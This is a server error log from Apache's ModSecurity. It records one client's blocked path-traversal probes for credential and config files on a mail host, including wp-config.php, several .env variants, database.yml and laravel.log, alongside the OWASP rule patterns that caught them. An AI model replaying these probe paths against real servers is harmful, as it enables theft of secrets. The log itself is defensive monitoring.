[Tue May 12 05:30:44.005484 2026] [security2:error] [pid 1820198:tid 1820214] [client 45.148.10.247:6892] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /js../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/wp-config.php"] [unique_id "agKe5M1tk6y7yBJLpJo6UwAAAI4"]
[Tue May 12 05:30:44.005567 2026] [security2:error] [pid 1820198:tid 1820214] [client 45.148.10.247:6892] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/wp-config.php"] [unique_id "agKe5M1tk6y7yBJLpJo6UwAAAI4"]
[Tue May 12 05:30:44.005734 2026] [security2:error] [pid 1820198:tid 1820214] [client 45.148.10.247:6892] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/wp-config.php"] [unique_id "agKe5M1tk6y7yBJLpJo6UwAAAI4"]
[Tue May 12 05:30:44.819917 2026] [security2:error] [pid 1820198:tid 1820214] [client 45.148.10.247:6892] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe5M1tk6y7yBJLpJo6UwAAAI4"]
[Tue May 12 05:30:44.860345 2026] [security2:error] [pid 1820198:tid 1820214] [client 45.148.10.247:6892] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /js../../app/etc/env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/app/etc/env.php"] [unique_id "agKe5M1tk6y7yBJLpJo6WAAAAI4"]
[Tue May 12 05:30:44.860577 2026] [security2:error] [pid 1820198:tid 1820214] [client 45.148.10.247:6892] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/app/etc/env.php"] [unique_id "agKe5M1tk6y7yBJLpJo6WAAAAI4"]
[Tue May 12 05:30:45.674849 2026] [security2:error] [pid 1820198:tid 1820214] [client 45.148.10.247:6892] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe5M1tk6y7yBJLpJo6WAAAAI4"]
[Tue May 12 05:30:45.714058 2026] [security2:error] [pid 1820198:tid 1820214] [client 45.148.10.247:6892] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /js../../settings.py"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/settings.py"] [unique_id "agKe5c1tk6y7yBJLpJo6XgAAAI4"]
[Tue May 12 05:30:45.714263 2026] [security2:error] [pid 1820198:tid 1820214] [client 45.148.10.247:6892] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/settings.py"] [unique_id "agKe5c1tk6y7yBJLpJo6XgAAAI4"]
[Tue May 12 05:30:46.506529 2026] [security2:error] [pid 1820198:tid 1820214] [client 45.148.10.247:6892] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe5c1tk6y7yBJLpJo6XgAAAI4"]
[Tue May 12 05:30:46.547395 2026] [security2:error] [pid 1820198:tid 1820214] [client 45.148.10.247:6892] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /js../../config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/config/database.yml"] [unique_id "agKe5s1tk6y7yBJLpJo6YgAAAI4"]
[Tue May 12 05:30:46.547635 2026] [security2:error] [pid 1820198:tid 1820214] [client 45.148.10.247:6892] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/config/database.yml"] [unique_id "agKe5s1tk6y7yBJLpJo6YgAAAI4"]
[Tue May 12 05:30:46.596807 2026] [security2:error] [pid 1808852:tid 1808869] [client 45.148.10.247:6922] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "mail.castiglionecf.com"] [uri "/storage/logs/laravel.log"] [unique_id "agKe5hfeipD4uoG21FoxVAAAAA4"]
[Tue May 12 05:30:46.597095 2026] [security2:error] [pid 1808852:tid 1808869] [client 45.148.10.247:6922] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/storage/logs/laravel.log"] [unique_id "agKe5hfeipD4uoG21FoxVAAAAA4"]
[Tue May 12 05:30:47.338869 2026] [security2:error] [pid 1820198:tid 1820214] [client 45.148.10.247:6892] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe5s1tk6y7yBJLpJo6YgAAAI4"]
[Tue May 12 05:30:47.382751 2026] [security2:error] [pid 1820198:tid 1820214] [client 45.148.10.247:6892] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /img../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/.env"] [unique_id "agKe581tk6y7yBJLpJo6ZwAAAI4"]
[Tue May 12 05:30:47.382835 2026] [security2:error] [pid 1820198:tid 1820214] [client 45.148.10.247:6892] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.env"] [unique_id "agKe581tk6y7yBJLpJo6ZwAAAI4"]
[Tue May 12 05:30:47.383016 2026] [security2:error] [pid 1820198:tid 1820214] [client 45.148.10.247:6892] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.env"] [unique_id "agKe581tk6y7yBJLpJo6ZwAAAI4"]
[Tue May 12 05:30:47.438922 2026] [security2:error] [pid 1808852:tid 1808869] [client 45.148.10.247:6922] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe5hfeipD4uoG21FoxVAAAAA4"]
[Tue May 12 05:30:48.164943 2026] [security2:error] [pid 1820198:tid 1820214] [client 45.148.10.247:6892] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe581tk6y7yBJLpJo6ZwAAAI4"]
[Tue May 12 05:30:48.205492 2026] [core:error] [pid 1820198:tid 1820214] [client 45.148.10.247:6892] AH10244: invalid URI path (/img../../../.env)
[Tue May 12 05:30:49.043565 2026] [core:error] [pid 1808852:tid 1808869] [client 45.148.10.247:6922] AH10244: invalid URI path (/img../../../../.env)
[Tue May 12 05:30:49.867573 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.247:6906] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /img../../.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/.env.local"] [unique_id "agKe6dr1yOh9TvizezigKgAAAEc"]
[Tue May 12 05:30:49.867673 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.247:6906] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.env.local"] [unique_id "agKe6dr1yOh9TvizezigKgAAAEc"]
[Tue May 12 05:30:49.867849 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.247:6906] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.env.local"] [unique_id "agKe6dr1yOh9TvizezigKgAAAEc"]
[Tue May 12 05:30:50.657423 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.247:6906] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe6dr1yOh9TvizezigKgAAAEc"]
[Tue May 12 05:30:50.699236 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.247:6906] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /img../../.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/.env.production"] [unique_id "agKe6tr1yOh9TvizezigLQAAAEc"]
[Tue May 12 05:30:50.699348 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.247:6906] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.env.production"] [unique_id "agKe6tr1yOh9TvizezigLQAAAEc"]
[Tue May 12 05:30:50.699572 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.247:6906] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.env.production"] [unique_id "agKe6tr1yOh9TvizezigLQAAAEc"]
[Tue May 12 05:30:51.499631 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.247:6906] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe6tr1yOh9TvizezigLQAAAEc"]
[Tue May 12 05:30:51.540781 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.247:6906] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /img../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/wp-config.php"] [unique_id "agKe69r1yOh9TvizezigMAAAAEc"]
[Tue May 12 05:30:51.540866 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.247:6906] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/wp-config.php"] [unique_id "agKe69r1yOh9TvizezigMAAAAEc"]
[Tue May 12 05:30:51.541069 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.247:6906] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/wp-config.php"] [unique_id "agKe69r1yOh9TvizezigMAAAAEc"]
[Tue May 12 05:30:51.892383 2026] [security2:error] [pid 1825179:tid 1825215] [client 43.138.68.113:55682] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pweil.com"] [uri "/"] [unique_id "agKe69r1yOh9TvizezigMgAAAFE"]
[Tue May 12 05:30:52.344480 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.247:6906] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe69r1yOh9TvizezigMAAAAEc"]
